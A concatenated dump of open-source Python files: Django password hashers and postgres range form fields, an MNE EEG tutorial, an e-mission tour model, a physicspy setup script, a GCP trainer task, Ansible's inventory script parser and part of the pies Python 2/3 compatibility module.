result is a 64 byte binary string. Iterations may be changed safely but you must rename the algorithm if you change SHA256. """ algorithm = "pbkdf2_sha256" iterations = 100000 digest = hashlib.sha256 def encode(self, password, salt, iterations=None): assert password is not None assert salt and '$' not in salt if not iterations: iterations = self.iterations hash = pbkdf2(password, salt, iterations, digest=self.digest) hash = base64.b64encode(hash).decode('ascii').strip() return "%s$%d$%s$%s" % (self.algorithm, iterations, salt, hash) def verify(self, password, encoded): algorithm, iterations, salt, hash = encoded.split('$', 3) assert algorithm == self.algorithm encoded_2 = self.encode(password, salt, int(iterations)) return constant_time_compare(encoded, encoded_2) def safe_summary(self, encoded): algorithm, iterations, salt, hash = encoded.split('$', 3) assert algorithm == self.algorithm return OrderedDict([ (_('algorithm'), algorithm), (_('iterations'), iterations), (_('salt'), mask_hash(salt)), (_('hash'), mask_hash(hash)), ]) def must_update(self, encoded): algorithm, iterations, salt, hash = encoded.split('$', 3) return int(iterations) != self.iterations def harden_runtime(self, password, encoded): algorithm, iterations, salt, hash = encoded.split('$', 3) extra_iterations = self.iterations - int(iterations) if extra_iterations > 0: self.encode(password, salt, extra_iterations) class PBKDF2SHA1PasswordHasher(PBKDF2PasswordHasher): """ Alternate PBKDF2 hasher which uses SHA1, the default PRF recommended by PKCS #5. This is compatible with other implementations of PBKDF2, such as openssl's PKCS5_PBKDF2_HMAC_SHA1(). """ algorithm = "pbkdf2_sha1" digest = hashlib.sha1 class Argon2PasswordHasher(BasePasswordHasher): """ Secure password hashing using the argon2 algorithm. This is the winner of the Password Hashing Competition 2013-2015 (https://password-hashing.net). It requires the argon2-cffi library which depends on native C code and might cause portability issues. """ algorithm = 'argon2' library = 'argon2' time_cost = 2 memory_cost = 512 parallelism = 2 def encode(self, password, salt): argon2 = self._load_library() data = argon2.low_level.hash_secret( force_bytes(password), force_bytes(salt), time_cost=self.time_cost, memory_cost=self.memory_cost, parallelism=self.parallelism, hash_len=argon2.DEFAULT_HASH_LENGTH, type=argon2.low_level.Type.I, ) return self.algorithm + data.decode('ascii') def verify(self, password, encoded): argon2 = self._load_library() algorithm, rest = encoded.split('$', 1) assert algorithm == self.algorithm try: return argon2.low_level.verify_secret( force_bytes('$' + rest), force_bytes(password), type=argon2.low_level.Type.I, ) except argon2.exceptions.VerificationError: return False def safe_summary(self, encoded): (algorithm, variety, version, time_cost, memory_cost, parallelism, salt, data) = self._decode(encoded) assert algorithm == self.algorithm return OrderedDict([ (_('algorithm'), algorithm), (_('variety'), variety), (_('version'), version), (_('memory cost'), memory_cost), (_('time cost'), time_cost), (_('parallelism'), parallelism), (_('salt'), mask_hash(salt)), (_('hash'), mask_hash(data)), ]) def must_update(self, encoded): (algorithm, variety, version, time_cost, memory_cost, parallelism, salt, data) = self._decode(encoded) assert algorithm == self.algorithm argon2 = self._load_library() return ( argon2.low_level.ARGON2_VERSION != version or self.time_cost != time_cost or self.memory_cost != memory_cost or self.parallelism != parallelism ) def harden_runtime(self, password, encoded): # The runtime for Argon2 is too complicated to implement a sensible # hardening algorithm. pass def _decode(self, encoded): """ Split an encoded hash and return: ( algorithm, variety, version, time_cost, memory_cost, parallelism, salt, data, ). """ bits = encoded.split('$') if len(bits) == 5: # Argon2 < 1.3 algorithm, variety, raw_params, salt, data = bits version = 0x10 else: assert len(bits) == 6 algorithm, variety, raw_version, raw_params, salt, data = bits assert raw_version.startswith('v=') version = int(raw_version[len('v='):]) params = dict(bit.split('=', 1) for bit in raw_params.split(',')) assert len(params) == 3 and all(x in params for x in ('t', 'm', 'p')) time_cost = int(params['t']) memory_cost = int(params['m']) parallelism = int(params['p']) return ( algorithm, variety, version, time_cost, memory_cost, parallelism, salt, data, ) class BCryptSHA256PasswordHasher(BasePasswordHasher): """ Secure password hashing using the bcrypt algorithm (recommended) This is considered by many to be the most secure algorithm but you must first install the bcrypt library. Please be warned that this library depends on native C code and might cause portability issues. """ algorithm = "bcrypt_sha256" digest = hashlib.sha256 library = ("bcrypt", "bcrypt") rounds = 12 def salt(self): bcrypt = self._load_library() return bcrypt.gensalt(self.rounds) def encode(self, password, salt): bcrypt = self._load_library() # Hash the password prior to using bcrypt to prevent password # truncation as described in #20138. if self.digest is not None: # Use binascii.hexlify() because a hex encoded bytestring is str. password = binascii.hexlify(self.digest(force_bytes(password)).digest()) else: password = force_bytes(password) data = bcrypt.hashpw(password, salt) return "%s$%s" % (self.algorithm, force_text(data)) def verify(self, password, encoded): algorithm, data = encoded.split('$', 1) assert algorithm == self.algorithm encoded_2 = self.encode(password, force_bytes(data)) return constant_time_compare(encoded, encoded_2) def safe_summary(self, encoded): algorithm, empty, algostr, work_factor, data = encoded.split('$', 4) assert algorithm == self.algorithm salt, checksum = data[:22], data[22:] return OrderedDict([ (_('algorithm'), algorithm), (_('work factor'), work_factor), (_('salt'), mask_hash(salt)), (_('checksum'), mask_hash(checksum)), ]) def must_update(self, encoded): algorithm, empty, algostr, rounds, data = encoded.split('$', 4) return int(rounds) != self.rounds def harden_runtime(self, password, encoded): _, data = encoded.split('$', 1) salt = data[:29] # Length of the salt in bcrypt. rounds = data.split('$')[2] # work factor is logarithmic, adding one doubles the load. diff = 2**(self.rounds - int(rounds)) - 1 while diff > 0: self.encode(password, force_bytes(salt)) diff -= 1 class BCryptPasswordHasher(BCryptSHA256PasswordHasher): """ Secure password hashing using the bcrypt algorithm This is considered by many to be the most secure algorithm but you must first install the bcrypt library. Please be warned that this library depends on native C code and might cause portability issues. This hasher does not first hash the password which means it is subject to the 72 character bcrypt password truncation, most use cases should prefer the BCryptSHA256PasswordHasher. See: https://code.djangoproject.com/ticket/20138 """ algorithm = "bcrypt" digest = None class SHA1PasswordHasher(BasePasswordHasher): """ The SHA1 password hashing algorithm (not recommended) """ algorithm = "sha1" def encode(self, password, salt): assert password is not None assert salt and '$' not in salt hash = hashlib.sha1(force_bytes(salt + password)).hexdigest() return "%s$%s$%s" % (self.algorithm, salt, hash) def verify(self, password, encoded): algorithm, salt, hash = encoded.split('$', 2) assert algorithm == self.algorithm encoded_2 = self.encode(password, salt) return constant_time_compare(encoded, encoded_2) def safe_summary(self, encoded): algorithm, salt, hash = encoded.split('$', 2) assert algorithm == self.algorithm return OrderedDict([ (_('algorithm'), algorithm), (_('salt'), mask_hash(salt, show=2)), (_('hash'), mask_hash(hash)), ]) def harden_runtime(self, password, encoded): pass class MD5PasswordHasher(BasePasswordHasher): """ The Salted MD5 password hashing algorithm (not recommended) """ algorithm = "md5" def encode(self, password, salt): assert password is not None assert salt and '$' not in salt hash = hashlib.md5(force_bytes(salt + password)).hexdigest() return "%s$%s$%s" % (self.algorithm, salt, hash) def verify(self, password, encoded): algorithm, salt, hash = encoded.split('$', 2) assert algorithm == self.algorithm encoded_2 = self.encode(password, salt) return constant_time_compare(encoded, encoded_2) def safe_summary(self, encoded): algorithm, salt, hash = encoded.split('$', 2) assert algorithm == self.algorithm return OrderedDict([ (_('algorithm'), algorithm), (_('salt'), mask_hash(salt, show=2)), (_('hash'), mask_hash(hash)), ]) def harden_runtime(self, password, encoded): pass class UnsaltedSHA1PasswordHasher(BasePasswordHasher): """ Very insecure algorithm that you should *never* use; store SHA1 hashes with an empty salt. This class is implemented because Django used to accept such password hashes. Some older Django installs still have these values lingering around so we need to handle and upgrade them properly. """ algorithm = "unsalted_sha1" def salt(self): return '' def encode(self, password, salt): assert salt == '' hash = hashlib.sha1(force_bytes(password)).hexdigest() return 'sha1$$%s' % hash def verify(self, password, encoded): encoded_2 = self.encode(password, '') return constant_time_compare(encoded, encoded_2) def safe_summary(self, encoded): assert encoded.startswith('sha1$$') hash = encoded[6:] return OrderedDict([ (_('algorithm'), self.algorithm), (_('hash'), mask_hash(hash)), ]) def harden_runtime(self, password, encoded): pass class UnsaltedMD5PasswordHasher(BasePasswordHasher): """ Incredibly insecure algorithm that you should *never* use; stores unsalted MD5 hashes without the algorithm prefix, also accepts MD5 hashes with an empty salt. This class is implemented because Django used to store passwords this way and to accept such password hashes. Some older Django installs still have these values lingering around so we need to handle and upgrade them properly. """ algorithm = "unsalted_md5" def salt(self): return '' def encode(self, password, salt): assert salt == '' return hashlib.md5(force_bytes(password)).hexdigest() def verify(self, password, encoded): if len(encoded) == 37 and encoded.startswith('md5$$'): encoded = encoded[5:] encoded_2 = self.encode(password, '') return constant_time_compare(encoded, encoded_2) def safe_summary(self, encoded): return OrderedDict([ (_('algorithm'), self.algorithm), (_('hash'), mask_hash(encoded, show=3)), ]) def harden_runtime(self, password, encoded): pass class CryptPasswordHasher(BasePasswordHasher): """ Password hashing using UNIX crypt (not recommended) The crypt module is not supported on all platforms. """ algorithm = "crypt" library = "crypt" def salt(self): return get_random_string(2) def encode(self, password, salt): crypt = self._load_library() assert len(salt) == 2 data = crypt.crypt(password, salt) assert data is not None # A platform like OpenBSD with a dummy crypt module. # we don't need to store the salt, but Django used to do this return "%s$%s$%s" % (self.algorithm, '', data) def verify(self, password, encoded): crypt = self._load_library() algorithm, salt, data = encoded.split('$', 2) assert algorithm == self.algorithm return constant_time_compare(data, crypt.crypt(password, data)) def safe_summary(self, encoded): algorithm, salt, data = encoded.split('$', 2) assert algorithm == self.algorithm return OrderedDict([ (_('algorithm'), algorithm), (_('salt'), salt), (_('hash'), mask_hash(data, show=3)), ]) def harden_runtime(self, password, encoded): pass
frdb194/django
refs/heads/master
django/contrib/postgres/forms/ranges.py
393
from psycopg2.extras import DateRange, DateTimeTZRange, NumericRange from django import forms from django.core import exceptions from django.forms.widgets import MultiWidget from django.utils.translation import ugettext_lazy as _ __all__ = ['IntegerRangeField', 'FloatRangeField', 'DateTimeRangeField', 'DateRangeField'] class BaseRangeField(forms.MultiValueField): default_error_messages = { 'invalid': _('Enter two valid values.'), 'bound_ordering': _('The start of the range must not exceed the end of the range.'), } def __init__(self, **kwargs): kwargs.setdefault('widget', RangeWidget(self.base_field.widget)) kwargs.setdefault('fields', [self.base_field(required=False), self.base_field(required=False)]) kwargs.setdefault('required', False) kwargs.setdefault('require_all_fields', False) super(BaseRangeField, self).__init__(**kwargs) def prepare_value(self, value): lower_base, upper_base = self.fields if isinstance(value, self.range_type): return [ lower_base.prepare_value(value.lower), upper_base.prepare_value(value.upper), ] if value is None: return [ lower_base.prepare_value(None), upper_base.prepare_value(None), ] return value def compress(self, values): if not values: return None lower, upper = values if lower is not None and upper is not None and lower > upper: raise exceptions.ValidationError( self.error_messages['bound_ordering'], code='bound_ordering', ) try: range_value = self.range_type(lower, upper) except TypeError: raise exceptions.ValidationError( self.error_messages['invalid'], code='invalid', ) else: return range_value class IntegerRangeField(BaseRangeField): default_error_messages = {'invalid': _('Enter two whole numbers.')} base_field = forms.IntegerField range_type = NumericRange class FloatRangeField(BaseRangeField): default_error_messages = {'invalid': _('Enter two numbers.')} base_field = forms.FloatField range_type = NumericRange class DateTimeRangeField(BaseRangeField): default_error_messages = {'invalid': _('Enter two valid date/times.')} base_field = forms.DateTimeField range_type = DateTimeTZRange class DateRangeField(BaseRangeField): default_error_messages = {'invalid': _('Enter two valid dates.')} base_field = forms.DateField range_type = DateRange class RangeWidget(MultiWidget): def __init__(self, base_widget, attrs=None): widgets = (base_widget, base_widget) super(RangeWidget, self).__init__(widgets, attrs) def decompress(self, value): if value: return (value.lower, value.upper) return (None, None)
wmvanvliet/mne-python
refs/heads/master
tutorials/source-modeling/plot_eeg_mri_coords.py
10
# -*- coding: utf-8 -*- """ .. _tut-eeg-mri-coords: EEG source localization given electrode locations on an MRI =========================================================== This tutorial explains how to compute the forward operator from EEG data when the electrodes are in MRI voxel coordinates. """ # Authors: Eric Larson <larson.eric.d@gmail.com> # # License: BSD Style. import os.path as op import nibabel from nilearn.plotting import plot_glass_brain import numpy as np import mne from mne.channels import compute_native_head_t, read_custom_montage from mne.viz import plot_alignment ############################################################################## # Prerequisites # ------------- # For this we will assume that you have: # # - raw EEG data # - your subject's MRI reconstrcted using FreeSurfer # - an appropriate boundary element model (BEM) # - an appropriate source space (src) # - your EEG electrodes in Freesurfer surface RAS coordinates, stored # in one of the formats :func:`mne.channels.read_custom_montage` supports # # Let's set the paths to these files for the ``sample`` dataset, including # a modified ``sample`` MRI showing the electrode locations plus a ``.elc`` # file corresponding to the points in MRI coords (these were `synthesized # <https://gist.github.com/larsoner/0ac6fad57e31cb2d9caa77350a9ff366>`__, # and thus are stored as part of the ``misc`` dataset). data_path = mne.datasets.sample.data_path() subjects_dir = op.join(data_path, 'subjects') fname_raw = op.join(data_path, 'MEG', 'sample', 'sample_audvis_raw.fif') bem_dir = op.join(subjects_dir, 'sample', 'bem') fname_bem = op.join(bem_dir, 'sample-5120-5120-5120-bem-sol.fif') fname_src = op.join(bem_dir, 'sample-oct-6-src.fif') misc_path = mne.datasets.misc.data_path() fname_T1_electrodes = op.join(misc_path, 'sample_eeg_mri', 'T1_electrodes.mgz') fname_mon = op.join(misc_path, 'sample_eeg_mri', 'sample_mri_montage.elc') ############################################################################## # Visualizing the MRI # ------------------- # Let's take our MRI-with-eeg-locations and adjust the affine to put the data # in MNI space, and plot using :func:`nilearn.plotting.plot_glass_brain`, # which does a maximum intensity projection (easy to see the fake electrodes). # This plotting function requires data to be in MNI space. # Because ``img.affine`` gives the voxel-to-world (RAS) mapping, if we apply a # RAS-to-MNI transform to it, it becomes the voxel-to-MNI transformation we # need. Thus we create a "new" MRI image in MNI coordinates and plot it as: img = nibabel.load(fname_T1_electrodes) # original subject MRI w/EEG ras_mni_t = mne.transforms.read_ras_mni_t('sample', subjects_dir) # from FS mni_affine = np.dot(ras_mni_t['trans'], img.affine) # vox->ras->MNI img_mni = nibabel.Nifti1Image(img.dataobj, mni_affine) # now in MNI coords! plot_glass_brain(img_mni, cmap='hot_black_bone', threshold=0., black_bg=True, resampling_interpolation='nearest', colorbar=True) ########################################################################## # Getting our MRI voxel EEG locations to head (and MRI surface RAS) coords # ------------------------------------------------------------------------ # Let's load our :class:`~mne.channels.DigMontage` using # :func:`mne.channels.read_custom_montage`, making note of the fact that # we stored our locations in Freesurfer surface RAS (MRI) coordinates. # # .. collapse:: |question| What if my electrodes are in MRI voxels? # :class: info # # If you have voxel coordinates in MRI voxels, you can transform these to # FreeSurfer surface RAS (called "mri" in MNE) coordinates using the # transformations that FreeSurfer computes during reconstruction. # ``nibabel`` calls this transformation the ``vox2ras_tkr`` transform # and operates in millimeters, so we can load it, convert it to meters, # and then apply it:: # # >>> pos_vox = ... # loaded from a file somehow # >>> img = nibabel.load(fname_T1) # >>> vox2mri_t = img.header.get_vox2ras_tkr() # voxel -> mri trans # >>> pos_mri = mne.transforms.apply_trans(vox2mri_t, pos_vox) # >>> pos_mri /= 1000. # mm -> m # # You can also verify that these are correct (or manually convert voxels # to MRI coords) by looking at the points in Freeview or tkmedit. dig_montage = read_custom_montage(fname_mon, head_size=None, coord_frame='mri') dig_montage.plot() ############################################################################## # We can then get our transformation from the MRI coordinate frame (where our # points are defined) to the head coordinate frame from the object. trans = compute_native_head_t(dig_montage) print(trans) # should be mri->head, as the "native" space here is MRI ############################################################################## # Let's apply this digitization to our dataset, and in the process # automatically convert our locations to the head coordinate frame, as # shown by :meth:`~mne.io.Raw.plot_sensors`. raw = mne.io.read_raw_fif(fname_raw) raw.pick_types(meg=False, eeg=True, stim=True, exclude=()).load_data() raw.set_montage(dig_montage) raw.plot_sensors(show_names=True) ############################################################################## # Now we can do standard sensor-space operations like make joint plots of # evoked data. raw.set_eeg_reference(projection=True) events = mne.find_events(raw) epochs = mne.Epochs(raw, events) cov = mne.compute_covariance(epochs, tmax=0.) evoked = epochs['1'].average() # trigger 1 in auditory/left evoked.plot_joint() ############################################################################## # Getting a source estimate # ------------------------- # New we have all of the components we need to compute a forward solution, # but first we should sanity check that everything is well aligned: fig = plot_alignment( evoked.info, trans=trans, show_axes=True, surfaces='head-dense', subject='sample', subjects_dir=subjects_dir) ############################################################################## # Now we can actually compute the forward: fwd = mne.make_forward_solution( evoked.info, trans=trans, src=fname_src, bem=fname_bem, verbose=True) ############################################################################## # Finally let's compute the inverse and apply it: inv = mne.minimum_norm.make_inverse_operator( evoked.info, fwd, cov, verbose=True) stc = mne.minimum_norm.apply_inverse(evoked, inv) brain = stc.plot(subjects_dir=subjects_dir, initial_time=0.1)
pwoodworth/intellij-community
refs/heads/master
python/testData/mover/simple.py
83
a =<caret> 1 b = 2
joshzarrabi/e-mission-server
refs/heads/master
emission/analysis/modelling/tour_model/tour_model.py
2
# Our imports import emission.simulation.markov_model_counter as esmmc ## A File meant to represent tour models for individual users ## A tour model is a week of each users most popular travel destinations # Monday # >>> home_start_mon = Location("home", 0, 0) # >>> work_1_mon = Location("work_1", 8, 0) # >>> coffee_mon = Location("coffee", 10, 0) # >>> lunch_mon = Location("lunch", 12, 0) # >>> work_2_mon = Location("work", 13, 0) # >>> home_end_mon = Location("home", 18, 0) # >>> home_start_mon.add_successors({work_1_mon : 1}) # >>> work_1_mon.add_successors({coffee_mon : 2}) # >>> coffee_mon.add_successors({lunch_mon : 3}) # >>> lunch_mon.add_successors({work_2_mon : 4}) ## Completes the cycle # >>> work_2_mon.add_successors({home_end_mon : 100}) # Tuesday # >>> home_start_tues = Location("home", 0, 1) # >>> work_1_tues = Location("work_1", 8, 1) # >>> coffee_tues = Location("coffee", 10, 1) # >>> lunch_tues = Location("lunch", 12, 1) # >>> work_2_tues = Location("work", 13, 1) # >>> home_end_tues = Location("home", 18, 1) # >>> home_start_tues.add_successors({work_1_tues : 1}) # >>> work_1_tues.add_successors({coffee_tues : 2}) # >>> coffee_tues.add_successors({lunch_tues : 3}) # >>> lunch_tues.add_successors({work_2_tues : 4}) ## Completes the cycle # >>> work_2_tues.add_successors({home_end_tues : 100}) # >>> mon = Day(0, home_start_mon) # >>> tues = Day(1, home_start_tues) # >>> days = [mon, tues] # >>> week = TourModel("naomi", days) # >>> tm_for_week = week.build_tour_model() # I know this seems like alot, but you shouldnt really be typing any of this out by hand # Maybe there is a better way to do this... class Location(object): def __init__(self, name, hour, day): self.hour = hour ## An int 0-23 representing the hour self.name = name ## The name of the place, important for equality self.day = day ## 0-6 Monday-Sunday self.counter = esmmc.Counter( ) ## Reps successors and probabilities of each one def add_successors(self, suc_dict): for loc, weight in suc_dict.iteritems(): if (loc.hour < self.hour) or (loc.day < self.day): raise Exception("You can not go backwards in time!") self.counter[loc] = weight def get_successor(self): return esmmc.sampleFromCounter(self.counter) def is_end(self): return self.counter.totalCount() == 0 def __eq__(self, other): return (self.name == other.name) and (self.day == other.day) def __ne__(self, other): return not self == other def __repr__(self): return self.name def __str__(self): return "At %s, at hour, %s on day %s" % (self.name, self.hour, self.day) class Day(object): """ Represents a day of a tour, full of locations """ def __init__(self, num_day, starting_point): self.day = num_day self.starting_point = starting_point def get_tour_model(self): tour_model = [ ] curr_node = self.starting_point tour_model.append(curr_node) while not curr_node.is_end(): curr_node = curr_node.get_successor() tour_model.append(curr_node) return tour_model class TourModel(object): """ A class that represents a canconical week of travel for a user of e-mission. """ def __init__(self, user, days): self.user = user self.days = days def build_tour_model(self): tour_model = [ ] for day in self.days: tour_model.append(day.get_tour_model()) return tour_model
imrehg/physicspy
refs/heads/master
setup.py
1
#!/usr/bin/env python """Physicspy: physics calculations in Python """ DOCLINES = __doc__.split("\n") import os from distutils.core import setup # BEFORE importing distutils, remove MANIFEST. distutils doesn't properly # update it when the contents of directories change. if os.path.exists('MANIFEST'): os.remove('MANIFEST') def setup_package(): from distutils.core import setup try: setup(name='physicspy', author = 'Gergely Imreh', author_email = 'imrehg@gmail.com', version = '0.1.0', description = DOCLINES[0], long_description = "\n".join(DOCLINES[2:]), url = 'http://github.com/imrehg/physicspy/', license = 'MIT', platforms = ["Windows", "Linux", "Solaris", "Mac OS-X", "Unix"], packages = ['physicspy','physicspy.optics','physicspy.quantum']) finally: pass return if __name__ == '__main__': setup_package()
GoogleCloudPlatform/training-data-analyst
refs/heads/master
courses/machine_learning/deepdive2/building_production_ml_systems/labs/taxifare/trainer/task.py
4
import argparse from trainer import model if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument( "--batch_size", help="Batch size for training steps", type=int, default=32 ) parser.add_argument( "--eval_data_path", help="GCS location pattern of eval files", required=True ) parser.add_argument( "--nnsize", help="Hidden layer sizes (provide space-separated sizes)", nargs="+", type=int, default=[32, 8] ) parser.add_argument( "--nbuckets", help="Number of buckets to divide lat and lon with", type=int, default=10 ) parser.add_argument( "--lr", help = "learning rate for optimizer", type = float, default = 0.001 ) parser.add_argument( "--num_evals", help="Number of times to evaluate model on eval data training.", type=int, default=5 ) parser.add_argument( "--num_examples_to_train_on", help="Number of examples to train on.", type=int, default=100 ) parser.add_argument( "--output_dir", help="GCS location to write checkpoints and export models", required=True ) parser.add_argument( "--train_data_path", help="GCS location pattern of train files containing eval URLs", required=True ) parser.add_argument( "--job-dir", help="this model ignores this field, but it is required by gcloud", default="junk" ) args = parser.parse_args() hparams = args.__dict__ hparams.pop("job-dir", None) model.train_and_evaluate(hparams)
alexanderturner/ansible
refs/heads/devel
lib/ansible/inventory/script.py
26
# (c) 2012-2014, Michael DeHaan <michael.dehaan@gmail.com> # # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. ############################################# from __future__ import (absolute_import, division, print_function) __metaclass__ = type import os import subprocess import sys from collections import Mapping from ansible.compat.six import iteritems from ansible import constants as C from ansible.errors import AnsibleError from ansible.inventory.host import Host from ansible.inventory.group import Group from ansible.module_utils.basic import json_dict_bytes_to_unicode from ansible.module_utils._text import to_native, to_text class InventoryScript: ''' Host inventory parser for ansible using external inventory scripts. ''' def __init__(self, loader, groups=None, filename=C.DEFAULT_HOST_LIST): if groups is None: groups = dict() self._loader = loader self.groups = groups # Support inventory scripts that are not prefixed with some # path information but happen to be in the current working # directory when '.' is not in PATH. self.filename = os.path.abspath(filename) cmd = [ self.filename, "--list" ] try: sp = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE) except OSError as e: raise AnsibleError("problem running %s (%s)" % (' '.join(cmd), e)) (stdout, stderr) = sp.communicate() if sp.returncode != 0: raise AnsibleError("Inventory script (%s) had an execution error: %s " % (filename,stderr)) # make sure script output is unicode so that json loader will output # unicode strings itself try: self.data = to_text(stdout, errors="strict") except Exception as e: raise AnsibleError("inventory data from {0} contained characters that cannot be interpreted as UTF-8: {1}".format(to_native(self.filename), to_native(e))) # see comment about _meta below self.host_vars_from_top = None self._parse(stderr) def _parse(self, err): all_hosts = {} # not passing from_remote because data from CMDB is trusted try: self.raw = self._loader.load(self.data) except Exception as e: sys.stderr.write(to_native(err) + "\n") raise AnsibleError("failed to parse executable inventory script results from {0}: {1}".format(to_native(self.filename), to_native(e))) if not isinstance(self.raw, Mapping): sys.stderr.write(to_native(err) + "\n") raise AnsibleError("failed to parse executable inventory script results from {0}: data needs to be formatted as a json dict".format(to_native(self.filename))) group = None for (group_name, data) in self.raw.items(): # in Ansible 1.3 and later, a "_meta" subelement may contain # a variable "hostvars" which contains a hash for each host # if this "hostvars" exists at all then do not call --host for each # host. This is for efficiency and scripts should still return data # if called with --host for backwards compat with 1.2 and earlier. if group_name == '_meta': if 'hostvars' in data: self.host_vars_from_top = data['hostvars'] continue if group_name not in self.groups: group = self.groups[group_name] = Group(group_name) group = self.groups[group_name] host = None if not isinstance(data, dict): data = {'hosts': data} # is not those subkeys, then simplified syntax, host with vars elif not any(k in data for k in ('hosts','vars','children')): data = {'hosts': [group_name], 'vars': data} if 'hosts' in data: if not isinstance(data['hosts'], list): raise AnsibleError("You defined a group \"%s\" with bad " "data for the host list:\n %s" % (group_name, data)) for hostname in data['hosts']: if hostname not in all_hosts: all_hosts[hostname] = Host(hostname) host = all_hosts[hostname] group.add_host(host) if 'vars' in data: if not isinstance(data['vars'], dict): raise AnsibleError("You defined a group \"%s\" with bad " "data for variables:\n %s" % (group_name, data)) for k, v in iteritems(data['vars']): group.set_variable(k, v) # Separate loop to ensure all groups are defined for (group_name, data) in self.raw.items(): if group_name == '_meta': continue if isinstance(data, dict) and 'children' in data: for child_name in data['children']: if child_name in self.groups: self.groups[group_name].add_child_group(self.groups[child_name]) # Finally, add all top-level groups as children of 'all'. # We exclude ungrouped here because it was already added as a child of # 'all' at the time it was created. for group in self.groups.values(): if group.depth == 0 and group.name not in ('all', 'ungrouped'): self.groups['all'].add_child_group(group) def get_host_variables(self, host): """ Runs <script> --host <hostname> to determine additional host variables """ if self.host_vars_from_top is not None: try: got = self.host_vars_from_top.get(host.name, {}) except AttributeError as e: raise AnsibleError("Improperly formatted host information for %s: %s" % (host.name,to_native(e))) return got cmd = [self.filename, "--host", host.name] try: sp = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE) except OSError as e: raise AnsibleError("problem running %s (%s)" % (' '.join(cmd), e)) (out, err) = sp.communicate() if out.strip() == '': return dict() try: return json_dict_bytes_to_unicode(self._loader.load(out)) except ValueError: raise AnsibleError("could not parse post variable response: %s, %s" % (cmd, out))
lisongmin/pies
refs/heads/develop
pies/overrides.py
2
"""pies/overrides.py. Overrides Python syntax to conform to the Python3 version as much as possible using a '*' import Copyright (C) 2013 Timothy Edmund Crosley Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ from __future__ import absolute_import import abc import functools import sys from numbers import Integral from ._utils import unmodified_isinstance, with_metaclass from .version_info import PY2, PY3, VERSION native_dict = dict native_round = round native_filter = filter native_map = map native_zip = zip native_range = range native_str = str native_chr = chr native_input = input native_next = next native_object = object common = ['native_dict', 'native_round', 'native_filter', 'native_map', 'native_range', 'native_str', 'native_chr', 'native_input', 'PY2', 'PY3', 'u', 'itemsview', 'valuesview', 'keysview', 'execute', 'integer_types', 'native_next', 'native_object', 'with_metaclass'] if PY3: import urllib import builtins from urllib import parse from collections import OrderedDict integer_types = (int, ) def u(string): return string def itemsview(collection): return collection.items() def valuesview(collection): return collection.values() def keysview(collection): return collection.keys() urllib.quote = parse.quote urllib.quote_plus = parse.quote_plus urllib.unquote = parse.unquote urllib.unquote_plus = parse.unquote_plus urllib.urlencode = parse.urlencode execute = getattr(builtins, 'exec') if VERSION[1] < 2: def callable(entity): return hasattr(entity, '__call__') common.append('callable') __all__ = common + ['OrderedDict', 'urllib'] else: from itertools import ifilter as filter from itertools import imap as map from itertools import izip as zip from decimal import Decimal, ROUND_HALF_EVEN try: from collections import OrderedDict except ImportError: from ordereddict import OrderedDict import codecs str = unicode chr = unichr input = raw_input range = xrange integer_types = (int, long) import sys stdout = sys.stdout stderr = sys.stderr reload(sys) sys.stdout = stdout sys.stderr = stderr sys.setdefaultencoding('utf-8') def _create_not_allowed(name): def _not_allow(*args, **kwargs): raise NameError("name '{0}' is not defined".format(name)) _not_allow.__name__ = name return _not_allow for removed in ('apply', 'cmp', 'coerce', 'execfile', 'raw_input', 'unpacks'): globals()[removed] = _create_not_allowed(removed) def u(s): if isinstance(s, unicode): return s else: return unicode(s.replace(r'\\', r'\\\\'), "unicode_escape") def execute(_code_, _globs_=None, _locs_=None): """Execute code in a namespace.""" if _globs_ is None: frame = sys._getframe(1) _globs_ = frame.f_globals if _locs_ is None: _locs_ = frame.f_locals del frame elif _locs_ is None: _locs_ = _globs_ exec("""exec _code_ in _globs_, _locs_""") class _dict_view_base(object): __slots__ = ('_dictionary', ) def __init__(self, dictionary): self._dictionary = dictionary def __repr__(self): return "{0}({1})".format(self.__class__.__name__, str(list(self.__iter__()))) def __unicode__(self): return str(self.__repr__()) def __str__(self): return str(self.__unicode__()) class dict_keys(_dict_view_base): __slots__ = () def __iter__(self): return self._dictionary.iterkeys() class dict_values(_dict_view_base): __slots__ = () def __iter__(self): return self._dictionary.itervalues() class dict_items(_dict_view_base): __slots__ = () def __iter__(self): return self._dictionary.iteritems() def itemsview(collection): return dict_items(collection) def valuesview(collection): return dict_values(collection) def keysview(collection): return dict_keys(collection) class dict(unmodified_isinstance(native_dict)): def has_key(self, *args, **kwargs): return AttributeError("'dict' object has no attribute 'has_key'") def items(self): return dict_items(self) def keys(self): return dict_keys(self) def values(self): return dict_values(self) def round(number, ndigits=None): return_int = False if ndigits is None: return_int = True ndigits = 0 if hasattr(number, '__round__'): return number.__round__(ndigits) if ndigits < 0: raise NotImplementedError('negative ndigits not supported yet') exponent = Decimal('10') ** (-ndigits) d = Decimal.from_float(number).quantize(exponent, rounding=ROUND_HALF_EVEN) if return_int: return int(d) else: return float(d) def next(iterator): try: iterator.__next__() except Exception: native_next(iterator) class FixStr(type): def __new__(cls, name, bases, dct): if 